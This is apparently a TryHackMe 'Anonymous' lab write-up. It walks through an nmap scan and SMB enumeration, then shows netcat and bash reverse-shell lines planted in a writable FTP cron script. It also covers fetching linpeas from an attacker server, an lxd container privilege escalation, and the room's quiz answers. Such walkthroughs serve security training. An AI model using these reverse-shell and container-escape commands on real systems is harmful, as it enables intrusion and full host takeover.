TryHackMe - Anonymous


└─# nmap -T4 -sC -sV -O -p-                                                                                                                                                                                               130 ⨯
Starting Nmap 7.92 ( ) at 2022-06-30 17:28 EDT
Stats: 0:04:57 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 38.59% done; ETC: 17:41 (0:07:53 remaining)
Stats: 0:08:17 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 55.55% done; ETC: 17:43 (0:06:38 remaining)
Nmap scan report for
Host is up (0.21s latency).
Not shown: 65531 closed tcp ports (reset)
21/tcp  open  ftp         vsftpd 2.0.8 or later
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts [NSE: writeable]
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
|   256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_  256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:

Network Distance: 4 hops
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2022-06-30T21:45:44
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: anonymous
|   NetBIOS computer name: ANONYMOUS\x00
|   Domain name: \x00
|   FQDN: anonymous
|_  System time: 2022-06-30T21:45:44+00:00

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 1039.43 seconds


└─# smbclient -L \\
Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        pics            Disk      My SMB Share Directory for Pics
        IPC$            IPC       IPC Service (anonymous server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            ANONYMOUS


  • In the picture above we can see that the second ls shows that the log file is bigger and the time is later

  • Let's try to modify the clean script with this


netcat 4444 -e /bin/bash
  • We set our listener rlwrap nc -lvnp 4444

  • So nothing happens with this. If we check the hint it mentions unexpected results with netcat.

  • Let's try with bash instead of netcat bash -i >& /dev/tcp/ 0>&1 and put the new file in the scripts folder in the ftp

  • We can grab the user flag

Privilege escalation

  • Let's get linpeas in our target wget

  • python3 -m http.server 80

  • From our target wget and chmod +x

  • We are part of interesting groups such as lxd sudo and adm. However sudo -l does not give anything back (we get prompted for the password). Let's try to abuse lxd and follow this article

  • To summarize here are the commands I ran (using the blog post as reference)

# From my kali
git clone
cd lxd-alpine-builder/
sudo ./build-alpine
# Setup HTTP server to host the image
python3 -m http.server 80
# From the target
mv alpine-v3.16-x86_64-20220701_1459.tar.gz alpine.tar.gz
lxc image import ./alpine.tar.gz --alias myimage
lxd init 
# we push enter to all the prompts to keep default setup
lxc init myimage mycontainer -c security.privileged=true
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
lxc start mycontainer
lxc exec mycontainer /bin/sh
  • We can grab the last flag. We need to access to the point where the system is mounted cd /mnt/root and we grab the flag cat root/root.txt!

Privesc alternative quicker way

  • Note for this way it is really important to not forget to use a tty shell we can get it after catching our shell with this command python -c 'import pty; pty.spawn("/bin/sh")'

  • It works


  1. Enumerate the machine. How many ports are open? 4

  2. What service is running on port 21? ftp

  3. What service is running on ports 139 and 445? smb

  4. There's a share on the user's computer. What's it called? pics

  • I let you find the flags :)

Last updated